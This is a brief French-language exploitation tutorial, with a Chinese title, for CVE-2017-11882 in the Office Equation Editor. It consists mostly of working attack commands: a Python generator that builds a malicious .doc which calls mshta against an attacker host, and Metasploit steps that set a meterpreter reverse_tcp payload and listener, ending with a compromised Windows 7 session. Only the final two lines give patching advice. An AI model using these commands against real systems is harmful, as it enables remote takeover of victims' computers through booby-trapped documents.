
CVE-2017-11882(通杀Office 2003到2016)
Du point de vue de l'exploitation, il peut toucher toutes les versions d'Office de 2003 à 2016, et la mise en place de l'environnement d'attaque est très simple. Cette vulnérabilité est causée par l'[Éditeur d'équations] dans Office. Comme le processus de l'éditeur ne vérifie pas la longueur des noms, cela provoque un débordement de tampon, et un attaquant peut exécuter du code arbitraire en construisant des caractères spéciaux. Par exemple, si un pirate exploite cette vulnérabilité pour créer un fichier Office avec une backdoor shell, lorsque l'utilisateur ordinaire ouvre ce fichier, l'ordinateur peut être directement contrôlé par le pirate.
office 2003
office 2007
office 2010
office 2013
office 2016
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

Cliquez sur le fichier "test.doc" généré, la calculatrice apparaît avec succès.
python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc


Génération réussie du fichier Word 11882-3.doc.
Placez le fichier cve_2017_11882.rb dans le répertoire /usr/share/metasploit-framework/modules/exploits/windows/smb :
msf > search CVE-2017-11882
msf > use exploit/windows/smb/CVE-2017-11882
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp
msf exploit(CVE-2017-11882) > set lhost 192.168.43.165
msf exploit(CVE-2017-11882) > set uripath 11882
msf exploit(CVE-2017-11882) > exploit
Démarrage de l'écoute :

Cliquez sur le fichier 11882-3.doc sur la machine cible Windows 7, la session est obtenue avec succès !

① Mise à jour en ligne : activez Windows Update, cela suffit pour la plupart des gens. ② Appliquer le correctif : l'adresse du correctif Microsoft correspondant à cette vulnérabilité : https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882